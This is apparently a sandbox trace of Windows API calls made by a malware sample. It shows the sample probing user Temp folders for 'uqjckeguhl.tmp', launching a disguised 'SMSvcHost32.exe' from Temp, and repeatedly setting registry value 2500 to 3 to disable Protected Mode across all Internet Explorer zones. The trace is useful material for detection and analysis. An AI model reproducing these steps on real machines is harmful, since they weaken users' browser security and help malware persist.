	[0085.687] GetLastError () returned 0x7a
	[0085.687] GetLastError () returned 0x7a
	[0085.687] GetLastError () returned 0x7a
	[0085.687] GetLastError () returned 0x7a
	[0085.687] GetLastError () returned 0x7a
	[0085.687] GetLastError () returned 0x7a
	[0085.687] GetLastError () returned 0x7a
	[0085.687] GetLastError () returned 0x7a
	[0085.687] GetLastError () returned 0x7a
	[0085.687] GetLastError () returned 0x7a
	[0085.687] GetLastError () returned 0x7a
	[0085.688] GetLastError () returned 0x7a
	[0085.688] GetLastError () returned 0x7a
	[0085.688] GetLastError () returned 0x7a
	[0085.688] GetLastError () returned 0x7a
	[0085.688] GetLastError () returned 0x7a
	[0085.688] GetLastError () returned 0x7a
	[0085.688] GetLastError () returned 0x7a
	[0085.688] wsprintfW (in: param_1=0x747cf0, param_2="%s\\%s\\%s\\uqjckeguhl.tmp" | out: param_1="C:\\Users\\All Users\\AppData\\Local\\Temp\\uqjckeguhl.tmp") returned 52
	[0085.688] GetFileAttributesW (lpFileName="C:\\Users\\All Users\\AppData\\Local\\Temp\\uqjckeguhl.tmp" (normalized: "c:\\users\\all users\\appdata\\local\\temp\\uqjckeguhl.tmp")) returned 0xffffffff
	[0085.688] GetLastError () returned 0x3
	[0085.688] GetLastError () returned 0x3
	[0085.688] GetLastError () returned 0x3
	[0085.688] GetLastError () returned 0x3
	[0085.688] GetLastError () returned 0x3
	[0085.688] GetLastError () returned 0x3
	[0085.688] GetLastError () returned 0x3
	[0085.688] GetLastError () returned 0x3
	[0085.688] GetLastError () returned 0x3
	[0085.688] GetLastError () returned 0x3
	[0085.688] GetLastError () returned 0x3
	[0085.688] GetLastError () returned 0x3
	[0085.688] GetLastError () returned 0x3
	[0085.688] GetLastError () returned 0x3
	[0085.688] GetLastError () returned 0x3
	[0085.688] GetLastError () returned 0x3
	[0085.688] GetLastError () returned 0x3
	[0085.688] GetLastError () returned 0x3
	[0085.688] GetLastError () returned 0x3
	[0085.688] GetLastError () returned 0x3
	[0085.688] GetLastError () returned 0x3
	[0085.688] GetLastError () returned 0x3
	[0085.688] GetLastError () returned 0x3
	[0085.688] GetLastError () returned 0x3
	[0085.688] GetLastError () returned 0x3
	[0085.688] GetLastError () returned 0x3
	[0085.688] GetLastError () returned 0x3
	[0085.688] GetLastError () returned 0x3
	[0085.688] GetLastError () returned 0x3
	[0085.688] GetLastError () returned 0x3
	[0085.688] GetLastError () returned 0x3
	[0085.688] GetLastError () returned 0x3
	[0085.688] GetLastError () returned 0x3
	[0085.688] GetLastError () returned 0x3
	[0085.688] GetLastError () returned 0x3
	[0085.688] GetLastError () returned 0x3
	[0085.688] GetLastError () returned 0x3
	[0085.688] GetLastError () returned 0x3
	[0085.688] GetLastError () returned 0x3
	[0085.688] GetLastError () returned 0x3
	[0085.688] GetLastError () returned 0x3
	[0085.688] GetLastError () returned 0x3
	[0085.689] GetLastError () returned 0x3
	[0085.689] GetLastError () returned 0x3
	[0085.689] GetLastError () returned 0x3
	[0085.689] GetLastError () returned 0x3
	[0085.689] GetLastError () returned 0x3
	[0085.689] GetLastError () returned 0x3
	[0085.689] GetLastError () returned 0x3
	[0085.689] GetLastError () returned 0x3
	[0085.689] GetLastError () returned 0x3
	[0085.689] GetLastError () returned 0x3
	[0085.689] GetLastError () returned 0x3
	[0085.689] GetLastError () returned 0x3
	[0085.689] GetLastError () returned 0x3
	[0085.689] GetLastError () returned 0x3
	[0085.689] GetLastError () returned 0x3
	[0085.689] GetLastError () returned 0x3
	[0085.689] GetLastError () returned 0x3
	[0085.689] GetLastError () returned 0x3
	[0085.689] GetLastError () returned 0x3
	[0085.689] GetLastError () returned 0x3
	[0085.689] GetLastError () returned 0x3
	[0085.689] GetLastError () returned 0x3
	[0085.689] GetLastError () returned 0x3
	[0085.689] GetLastError () returned 0x3
	[0085.689] GetLastError () returned 0x3
	[0085.689] GetLastError () returned 0x3
	[0085.689] GetLastError () returned 0x3
	[0085.689] GetLastError () returned 0x3
	[0085.689] GetLastError () returned 0x3
	[0085.689] GetLastError () returned 0x3
	[0085.689] GetLastError () returned 0x3
	[0085.689] GetLastError () returned 0x3
	[0085.689] GetLastError () returned 0x3
	[0085.689] GetLastError () returned 0x3
	[0085.689] GetLastError () returned 0x3
	[0085.689] GetLastError () returned 0x3
	[0085.689] GetLastError () returned 0x3
	[0085.689] GetLastError () returned 0x3
	[0085.689] GetLastError () returned 0x3
	[0085.689] GetLastError () returned 0x3
	[0085.689] GetLastError () returned 0x3
	[0085.689] GetLastError () returned 0x3
	[0085.689] GetLastError () returned 0x3
	[0085.689] GetLastError () returned 0x3
	[0085.689] GetLastError () returned 0x3
	[0085.689] GetLastError () returned 0x3
	[0085.689] GetLastError () returned 0x3
	[0085.689] GetLastError () returned 0x3
	[0085.689] GetLastError () returned 0x3
	[0085.689] GetLastError () returned 0x3
	[0085.689] GetLastError () returned 0x3
	[0085.689] GetLastError () returned 0x3
	[0085.689] GetLastError () returned 0x3
	[0085.689] GetLastError () returned 0x3
	[0085.689] wsprintfW (in: param_1=0x747cf0, param_2="%s\\%s\\%s\\uqjckeguhl.tmp" | out: param_1="C:\\Users\\All Users\\Local Settings\\Temp\\uqjckeguhl.tmp") returned 53
	[0085.689] GetFileAttributesW (lpFileName="C:\\Users\\All Users\\Local Settings\\Temp\\uqjckeguhl.tmp" (normalized: "c:\\users\\all users\\local settings\\temp\\uqjckeguhl.tmp")) returned 0xffffffff
	[0085.690] FindNextFileW (in: hFindFile=0x392ac60, lpFindFileData=0x2a6fbe4 | out: lpFindFileData=0x2a6fbe4) returned 1
	[0085.690] GetLastError () returned 0x3
	[0085.690] GetLastError () returned 0x3
	[0085.690] GetLastError () returned 0x3
	[0085.690] GetLastError () returned 0x3
	[0085.690] GetLastError () returned 0x3
	[0085.690] GetLastError () returned 0x3
	[0085.690] GetLastError () returned 0x3
	[0085.690] GetLastError () returned 0x3
	[0085.690] GetLastError () returned 0x3
	[0085.690] GetLastError () returned 0x3
	[0085.690] GetLastError () returned 0x3
	[0085.690] GetLastError () returned 0x3
	[0085.690] GetLastError () returned 0x3
	[0085.690] GetLastError () returned 0x3
	[0085.690] GetLastError () returned 0x3
	[0085.690] GetLastError () returned 0x3
	[0085.690] GetLastError () returned 0x3
	[0085.690] GetLastError () returned 0x3
	[0085.690] GetLastError () returned 0x3
	[0085.690] GetLastError () returned 0x3
	[0085.690] lstrcmpW (lpString1="Default", lpString2=".") returned 1
	[0085.690] lstrcmpW (lpString1="Default", lpString2="..") returned 1
	[0085.690] GetLastError () returned 0x3
	[0085.690] GetLastError () returned 0x3
	[0085.690] GetLastError () returned 0x3
	[0085.690] GetLastError () returned 0x3
	[0085.690] GetLastError () returned 0x3
	[0085.690] GetLastError () returned 0x3
	[0085.690] GetLastError () returned 0x3
	[0085.690] GetLastError () returned 0x3
	[0085.690] GetLastError () returned 0x3
	[0085.690] GetLastError () returned 0x3
	[0085.690] GetLastError () returned 0x3
	[0085.690] GetLastError () returned 0x3
	[0085.690] GetLastError () returned 0x3
	[0085.690] GetLastError () returned 0x3
	[0085.690] GetLastError () returned 0x3
	[0085.691] GetLastError () returned 0x3
	[0085.691] GetLastError () returned 0x3
	[0085.691] GetLastError () returned 0x3
	[0085.691] GetLastError () returned 0x3
	[0085.691] GetLastError () returned 0x3
	[0085.691] GetLastError () returned 0x3
	[0085.691] GetLastError () returned 0x3
	[0085.691] GetLastError () returned 0x3
	[0085.691] GetLastError () returned 0x3
	[0085.691] GetLastError () returned 0x3
	[0085.691] GetLastError () returned 0x3
	[0085.691] GetLastError () returned 0x3
	[0085.691] GetLastError () returned 0x3
	[0085.691] GetLastError () returned 0x3
	[0085.691] GetLastError () returned 0x3
	[0085.691] GetLastError () returned 0x3
	[0085.691] GetLastError () returned 0x3
	[0085.691] GetLastError () returned 0x3
	[0085.691] GetLastError () returned 0x3
	[0085.691] GetLastError () returned 0x3
	[0085.691] GetLastError () returned 0x3
	[0085.691] GetLastError () returned 0x3
	[0085.691] GetLastError () returned 0x3
	[0085.691] GetLastError () returned 0x3
	[0085.691] GetLastError () returned 0x3
	[0085.691] GetLastError () returned 0x3
	[0085.691] GetLastError () returned 0x3
	[0085.691] GetLastError () returned 0x3
	[0085.691] GetLastError () returned 0x3
	[0085.691] GetLastError () returned 0x3
	[0085.691] GetLastError () returned 0x3
	[0085.691] GetLastError () returned 0x3
	[0085.691] GetLastError () returned 0x3
	[0085.691] GetLastError () returned 0x3
	[0085.691] GetLastError () returned 0x3
	[0085.691] GetLastError () returned 0x3
	[0085.691] GetLastError () returned 0x3
	[0085.691] GetLastError () returned 0x3
	[0085.691] GetLastError () returned 0x3
	[0085.691] GetLastError () returned 0x3
	[0085.691] GetLastError () returned 0x3
	[0085.691] GetLastError () returned 0x3
	[0085.691] GetLastError () returned 0x3
	[0085.691] GetLastError () returned 0x3
	[0085.691] GetLastError () returned 0x3
	[0085.691] GetLastError () returned 0x3
	[0085.691] GetLastError () returned 0x3
	[0085.691] GetLastError () returned 0x3
	[0085.691] GetLastError () returned 0x3
	[0085.691] GetLastError () returned 0x3
	[0085.691] GetLastError () returned 0x3
	[0085.691] GetLastError () returned 0x3
	[0085.691] GetLastError () returned 0x3
	[0085.691] GetLastError () returned 0x3
	[0085.691] GetLastError () returned 0x3
	[0085.692] wsprintfW (in: param_1=0x747cf0, param_2="%s\\%s\\%s\\uqjckeguhl.tmp" | out: param_1="C:\\Users\\Default\\AppData\\Local\\Temp\\uqjckeguhl.tmp") returned 50
	[0085.692] GetFileAttributesW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Temp\\uqjckeguhl.tmp" (normalized: "c:\\users\\default\\appdata\\local\\temp\\uqjckeguhl.tmp")) returned 0xffffffff
	[0085.693] wsprintfW (in: param_1=0x747cf0, param_2="%s\\%s\\%s\\uqjckeguhl.tmp" | out: param_1="C:\\Users\\Default\\Local Settings\\Temp\\uqjckeguhl.tmp") returned 51
	[0085.693] GetFileAttributesW (lpFileName="C:\\Users\\Default\\Local Settings\\Temp\\uqjckeguhl.tmp" (normalized: "c:\\users\\default\\local settings\\temp\\uqjckeguhl.tmp")) returned 0xffffffff
	[0085.694] FindNextFileW (in: hFindFile=0x392ac60, lpFindFileData=0x2a6fbe4 | out: lpFindFileData=0x2a6fbe4) returned 1
	[0085.694] wsprintfW (in: param_1=0x747cf0, param_2="%s\\%s\\%s\\uqjckeguhl.tmp" | out: param_1="C:\\Users\\Default User\\AppData\\Local\\Temp\\uqjckeguhl.tmp") returned 55
	[0085.694] GetFileAttributesW (lpFileName="C:\\Users\\Default User\\AppData\\Local\\Temp\\uqjckeguhl.tmp" (normalized: "c:\\users\\default user\\appdata\\local\\temp\\uqjckeguhl.tmp")) returned 0xffffffff
	[0085.695] wsprintfW (in: param_1=0x747cf0, param_2="%s\\%s\\%s\\uqjckeguhl.tmp" | out: param_1="C:\\Users\\Default User\\Local Settings\\Temp\\uqjckeguhl.tmp") returned 56
	[0085.695] GetFileAttributesW (lpFileName="C:\\Users\\Default User\\Local Settings\\Temp\\uqjckeguhl.tmp" (normalized: "c:\\users\\default user\\local settings\\temp\\uqjckeguhl.tmp")) returned 0xffffffff
	[0085.697] FindNextFileW (in: hFindFile=0x392ac60, lpFindFileData=0x2a6fbe4 | out: lpFindFileData=0x2a6fbe4) returned 1
	[0085.697] FindNextFileW (in: hFindFile=0x392ac60, lpFindFileData=0x2a6fbe4 | out: lpFindFileData=0x2a6fbe4) returned 1
	[0085.697] wsprintfW (in: param_1=0x747cf0, param_2="%s\\%s\\%s\\uqjckeguhl.tmp" | out: param_1="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\uqjckeguhl.tmp") returned 51
	[0085.697] GetFileAttributesW (lpFileName="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\uqjckeguhl.tmp" (normalized: "c:\\users\\nd9e1fyi\\appdata\\local\\temp\\uqjckeguhl.tmp")) returned 0xffffffff
	[0085.697] wsprintfW (in: param_1=0x747cf0, param_2="%s\\%s\\%s\\uqjckeguhl.tmp" | out: param_1="C:\\Users\\Nd9E1FYi\\Local Settings\\Temp\\uqjckeguhl.tmp") returned 52
	[0085.697] GetFileAttributesW (lpFileName="C:\\Users\\Nd9E1FYi\\Local Settings\\Temp\\uqjckeguhl.tmp" (normalized: "c:\\users\\nd9e1fyi\\local settings\\temp\\uqjckeguhl.tmp")) returned 0xffffffff
	[0085.697] FindNextFileW (in: hFindFile=0x392ac60, lpFindFileData=0x2a6fbe4 | out: lpFindFileData=0x2a6fbe4) returned 1
	[0085.698] wsprintfW (in: param_1=0x747cf0, param_2="%s\\%s\\%s\\uqjckeguhl.tmp" | out: param_1="C:\\Users\\Public\\AppData\\Local\\Temp\\uqjckeguhl.tmp") returned 49
	[0085.698] GetFileAttributesW (lpFileName="C:\\Users\\Public\\AppData\\Local\\Temp\\uqjckeguhl.tmp" (normalized: "c:\\users\\public\\appdata\\local\\temp\\uqjckeguhl.tmp")) returned 0xffffffff
	[0085.698] wsprintfW (in: param_1=0x747cf0, param_2="%s\\%s\\%s\\uqjckeguhl.tmp" | out: param_1="C:\\Users\\Public\\Local Settings\\Temp\\uqjckeguhl.tmp") returned 50
	[0085.698] GetFileAttributesW (lpFileName="C:\\Users\\Public\\Local Settings\\Temp\\uqjckeguhl.tmp" (normalized: "c:\\users\\public\\local settings\\temp\\uqjckeguhl.tmp")) returned 0xffffffff
	[0085.698] FindNextFileW (in: hFindFile=0x392ac60, lpFindFileData=0x2a6fbe4 | out: lpFindFileData=0x2a6fbe4) returned 0
	[0085.698] FindClose (in: hFindFile=0x392ac60 | out: hFindFile=0x392ac60) returned 1

Thread:
	id = 54
	os_tid = 0x370

	[0070.367] OpenProcess (dwDesiredAccess=0x100400, bInheritHandle=0, dwProcessId=0xdb0) returned 0x1c8
	[0070.368] GetLastError () returned 0x57
	[0070.368] GetLastError () returned 0x57
	[0070.368] GetLastError () returned 0x57
	[0070.368] GetLastError () returned 0x57
	[0070.368] GetLastError () returned 0x57
	[0070.368] GetLastError () returned 0x57
	[0070.368] GetLastError () returned 0x57
	[0070.368] GetLastError () returned 0x57
	[0070.368] GetLastError () returned 0x57
	[0070.368] GetLastError () returned 0x57
	[0070.368] GetLastError () returned 0x57
	[0070.368] GetLastError () returned 0x57
	[0070.368] GetLastError () returned 0x57
	[0070.368] GetLastError () returned 0x57
	[0070.368] GetLastError () returned 0x57
	[0070.368] GetLastError () returned 0x57
	[0070.368] GetLastError () returned 0x57
	[0070.368] GetLastError () returned 0x57
	[0070.368] GetLastError () returned 0x57
	[0070.368] GetLastError () returned 0x57
	[0070.368] GetLastError () returned 0x57
	[0070.368] GetLastError () returned 0x57
	[0070.368] GetLastError () returned 0x57
	[0070.368] GetLastError () returned 0x57
	[0070.368] GetLastError () returned 0x57
	[0070.368] GetLastError () returned 0x57
	[0070.368] GetLastError () returned 0x57
	[0070.368] GetLastError () returned 0x57
	[0070.368] GetLastError () returned 0x57
	[0070.368] GetLastError () returned 0x57
	[0070.368] GetLastError () returned 0x57
	[0070.368] GetLastError () returned 0x57
	[0070.368] GetLastError () returned 0x57
	[0070.368] GetLastError () returned 0x57
	[0070.368] GetLastError () returned 0x57
	[0070.368] GetLastError () returned 0x57
	[0070.369] StrCpyW (in: psz1=0x7715e8, psz2="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\SMSvcHost32.exe" | out: psz1="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\SMSvcHost32.exe") returned="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\SMSvcHost32.exe"
	[0070.369] StrCatW (in: psz1="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\SMSvcHost32.exe", psz2=" --vwxyz" | out: psz1="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\SMSvcHost32.exe --vwxyz") returned="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\SMSvcHost32.exe --vwxyz"
	[0070.369] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\SMSvcHost32.exe --vwxyz", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x9000008, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x25afc94*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x25aff20 | out: lpCommandLine="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\SMSvcHost32.exe --vwxyz", lpProcessInformation=0x25aff20*(hProcess=0x21c, hThread=0x1e8, dwProcessId=0xdb8, dwThreadId=0xe74)) returned 1
	[0070.379] CloseHandle (hObject=0x1e8) returned 1
	[0070.380] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x21c) returned 0x0
	[0070.380] WaitForMultipleObjects (nCount=0x2, lpHandles=0x25aff4c*=0x21c, bWaitAll=0, dwMilliseconds=0xffffffff) 

Thread:
	id = 55
	os_tid = 0xe7c

	[0070.380] GetLastError () returned 0x57
	[0070.380] GetLastError () returned 0x57
	[0070.380] GetLastError () returned 0x57
	[0070.380] GetLastError () returned 0x57
	[0070.380] GetLastError () returned 0x57
	[0070.380] GetLastError () returned 0x57
	[0070.380] GetLastError () returned 0x57
	[0070.380] GetLastError () returned 0x57
	[0070.380] GetLastError () returned 0x57
	[0070.380] GetLastError () returned 0x57
	[0070.380] GetLastError () returned 0x57
	[0070.380] GetLastError () returned 0x57
	[0070.380] GetLastError () returned 0x57
	[0070.380] GetLastError () returned 0x57
	[0070.380] GetLastError () returned 0x57
	[0070.380] GetLastError () returned 0x57
	[0070.380] GetLastError () returned 0x57
	[0070.380] GetLastError () returned 0x57
	[0070.380] GetLastError () returned 0x57
	[0070.380] GetLastError () returned 0x57
	[0070.380] GetLastError () returned 0x57
	[0070.380] GetLastError () returned 0x57
	[0070.380] GetLastError () returned 0x57
	[0070.380] GetLastError () returned 0x57
	[0070.380] GetLastError () returned 0x57
	[0070.380] GetLastError () returned 0x57
	[0070.380] GetLastError () returned 0x57
	[0070.380] GetLastError () returned 0x57
	[0070.380] GetLastError () returned 0x57
	[0070.380] GetLastError () returned 0x57
	[0070.380] GetLastError () returned 0x57
	[0070.380] GetLastError () returned 0x57
	[0070.380] GetLastError () returned 0x57
	[0070.380] GetLastError () returned 0x57
	[0070.380] GetLastError () returned 0x57
	[0070.380] GetLastError () returned 0x57
	[0070.380] GetLastError () returned 0x57
	[0070.380] GetLastError () returned 0x57
	[0070.380] GetLastError () returned 0x57
	[0070.380] GetLastError () returned 0x57
	[0070.380] GetLastError () returned 0x57
	[0070.380] GetLastError () returned 0x57
	[0070.380] GetLastError () returned 0x57
	[0070.380] GetLastError () returned 0x57
	[0070.380] GetLastError () returned 0x57
	[0070.380] GetLastError () returned 0x57
	[0070.381] GetLastError () returned 0x57
	[0070.381] GetLastError () returned 0x57
	[0070.381] GetLastError () returned 0x57
	[0070.381] GetLastError () returned 0x57
	[0070.381] GetLastError () returned 0x57
	[0070.381] GetLastError () returned 0x57
	[0070.381] GetLastError () returned 0x57
	[0070.381] GetLastError () returned 0x57
	[0070.381] GetLastError () returned 0x57
	[0070.381] GetLastError () returned 0x57
	[0070.381] GetLastError () returned 0x57
	[0070.381] GetLastError () returned 0x57
	[0070.381] GetLastError () returned 0x57
	[0070.381] GetLastError () returned 0x57
	[0070.381] GetLastError () returned 0x57
	[0070.381] GetLastError () returned 0x57
	[0070.381] GetLastError () returned 0x57
	[0070.381] GetLastError () returned 0x57
	[0070.381] GetLastError () returned 0x57
	[0070.381] GetLastError () returned 0x57
	[0070.381] GetLastError () returned 0x57
	[0070.381] GetLastError () returned 0x57
	[0070.381] GetLastError () returned 0x57
	[0070.381] GetLastError () returned 0x57
	[0070.381] GetLastError () returned 0x57
	[0070.381] GetLastError () returned 0x57
	[0070.381] GetLastError () returned 0x57
	[0070.381] GetLastError () returned 0x57
	[0070.381] GetLastError () returned 0x57
	[0070.381] GetLastError () returned 0x57
	[0070.381] GetLastError () returned 0x57
	[0070.381] GetLastError () returned 0x57
	[0070.381] GetLastError () returned 0x57
	[0070.381] GetLastError () returned 0x57
	[0070.381] GetLastError () returned 0x57
	[0070.381] GetLastError () returned 0x57
	[0070.381] GetLastError () returned 0x57
	[0070.381] GetLastError () returned 0x57
	[0070.381] GetLastError () returned 0x57
	[0070.381] GetLastError () returned 0x57
	[0070.381] GetLastError () returned 0x57
	[0070.381] GetLastError () returned 0x57
	[0070.381] GetLastError () returned 0x57
	[0070.381] GetLastError () returned 0x57
	[0070.381] GetLastError () returned 0x57
	[0070.381] GetLastError () returned 0x57
	[0070.381] GetLastError () returned 0x57
	[0070.381] GetLastError () returned 0x57
	[0070.381] GetLastError () returned 0x57
	[0070.381] GetLastError () returned 0x57
	[0070.381] GetLastError () returned 0x57
	[0070.381] GetLastError () returned 0x57
	[0070.381] GetLastError () returned 0x57
	[0070.381] GetLastError () returned 0x57
	[0070.381] GetLastError () returned 0x57
	[0070.381] GetLastError () returned 0x57
	[0070.381] GetLastError () returned 0x57
	[0070.381] GetLastError () returned 0x57
	[0070.381] GetLastError () returned 0x57
	[0070.381] GetLastError () returned 0x57
	[0070.381] GetLastError () returned 0x57
	[0070.381] GetLastError () returned 0x57
	[0070.381] GetLastError () returned 0x57
	[0070.381] GetLastError () returned 0x57
	[0070.382] GetLastError () returned 0x57
	[0070.382] GetLastError () returned 0x57
	[0070.382] GetLastError () returned 0x57
	[0070.382] GetLastError () returned 0x57
	[0070.382] GetLastError () returned 0x57
	[0070.382] GetLastError () returned 0x57
	[0070.382] GetLastError () returned 0x57
	[0070.382] GetLastError () returned 0x57
	[0070.382] GetLastError () returned 0x57
	[0070.382] GetLastError () returned 0x57
	[0070.382] GetLastError () returned 0x57
	[0070.382] GetLastError () returned 0x57
	[0070.382] GetLastError () returned 0x57
	[0070.382] GetLastError () returned 0x57
	[0070.382] GetLastError () returned 0x57
	[0070.382] GetLastError () returned 0x57
	[0070.382] GetLastError () returned 0x57
	[0070.382] GetLastError () returned 0x57
	[0070.382] GetLastError () returned 0x57
	[0070.382] GetLastError () returned 0x57
	[0070.382] GetLastError () returned 0x57
	[0070.382] GetLastError () returned 0x57
	[0070.382] GetLastError () returned 0x57
	[0070.382] GetLastError () returned 0x57
	[0070.382] GetLastError () returned 0x57
	[0070.382] GetLastError () returned 0x57
	[0070.382] GetLastError () returned 0x57
	[0070.382] GetLastError () returned 0x57
	[0070.382] GetLastError () returned 0x57
	[0070.382] GetLastError () returned 0x57
	[0070.382] GetLastError () returned 0x57
	[0070.382] GetLastError () returned 0x57
	[0070.382] GetLastError () returned 0x57
	[0070.382] GetLastError () returned 0x57
	[0070.382] GetLastError () returned 0x57
	[0070.382] GetLastError () returned 0x57
	[0070.382] GetLastError () returned 0x57
	[0070.382] GetLastError () returned 0x57
	[0070.382] GetLastError () returned 0x57
	[0070.382] GetLastError () returned 0x57
	[0070.382] wsprintfA (in: param_1=0x2bafe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\0\\") returned 68
	[0070.382] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\0\\", phkResult=0x2baff10 | out: phkResult=0x2baff10*=0x224) returned 0x0
	[0070.382] RegSetValueExA (in: hKey=0x224, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2baff04*=0x3, cbData=0x4 | out: lpData=0x2baff04*=0x3) returned 0x0
	[0070.383] RegCloseKey (hKey=0x224) returned 0x0
	[0070.383] wsprintfA (in: param_1=0x2bafe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\1\\") returned 68
	[0070.383] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\1\\", phkResult=0x2baff10 | out: phkResult=0x2baff10*=0x224) returned 0x0
	[0070.383] RegSetValueExA (in: hKey=0x224, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2baff04*=0x3, cbData=0x4 | out: lpData=0x2baff04*=0x3) returned 0x0
	[0070.383] RegCloseKey (hKey=0x224) returned 0x0
	[0070.383] wsprintfA (in: param_1=0x2bafe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\2\\") returned 68
	[0070.383] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\2\\", phkResult=0x2baff10 | out: phkResult=0x2baff10*=0x224) returned 0x0
	[0070.383] RegSetValueExA (in: hKey=0x224, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2baff04*=0x3, cbData=0x4 | out: lpData=0x2baff04*=0x3) returned 0x0
	[0070.450] RegCloseKey (hKey=0x224) returned 0x0
	[0070.450] wsprintfA (in: param_1=0x2bafe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3\\") returned 68
	[0070.450] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3\\", phkResult=0x2baff10 | out: phkResult=0x2baff10*=0x224) returned 0x0
	[0070.451] RegSetValueExA (in: hKey=0x224, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2baff04*=0x3, cbData=0x4 | out: lpData=0x2baff04*=0x3) returned 0x0
	[0070.451] RegCloseKey (hKey=0x224) returned 0x0
	[0070.451] wsprintfA (in: param_1=0x2bafe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\4\\") returned 68
	[0070.451] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\4\\", phkResult=0x2baff10 | out: phkResult=0x2baff10*=0x224) returned 0x0
	[0070.451] RegSetValueExA (in: hKey=0x224, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2baff04*=0x3, cbData=0x4 | out: lpData=0x2baff04*=0x3) returned 0x0
	[0070.451] RegCloseKey (hKey=0x224) returned 0x0
	[0070.451] Sleep (dwMilliseconds=0x3e8) 
	[0071.465] wsprintfA (in: param_1=0x2bafe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\0\\") returned 68
	[0071.465] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\0\\", phkResult=0x2baff10 | out: phkResult=0x2baff10*=0x224) returned 0x0
	[0071.466] RegSetValueExA (in: hKey=0x224, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2baff04*=0x3, cbData=0x4 | out: lpData=0x2baff04*=0x3) returned 0x0
	[0071.467] RegCloseKey (hKey=0x224) returned 0x0
	[0071.467] wsprintfA (in: param_1=0x2bafe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\1\\") returned 68
	[0071.467] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\1\\", phkResult=0x2baff10 | out: phkResult=0x2baff10*=0x224) returned 0x0
	[0071.467] RegSetValueExA (in: hKey=0x224, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2baff04*=0x3, cbData=0x4 | out: lpData=0x2baff04*=0x3) returned 0x0
	[0071.467] RegCloseKey (hKey=0x224) returned 0x0
	[0071.467] wsprintfA (in: param_1=0x2bafe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\2\\") returned 68
	[0071.467] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\2\\", phkResult=0x2baff10 | out: phkResult=0x2baff10*=0x224) returned 0x0
	[0071.468] RegSetValueExA (in: hKey=0x224, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2baff04*=0x3, cbData=0x4 | out: lpData=0x2baff04*=0x3) returned 0x0
	[0071.468] RegCloseKey (hKey=0x224) returned 0x0
	[0071.468] wsprintfA (in: param_1=0x2bafe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3\\") returned 68
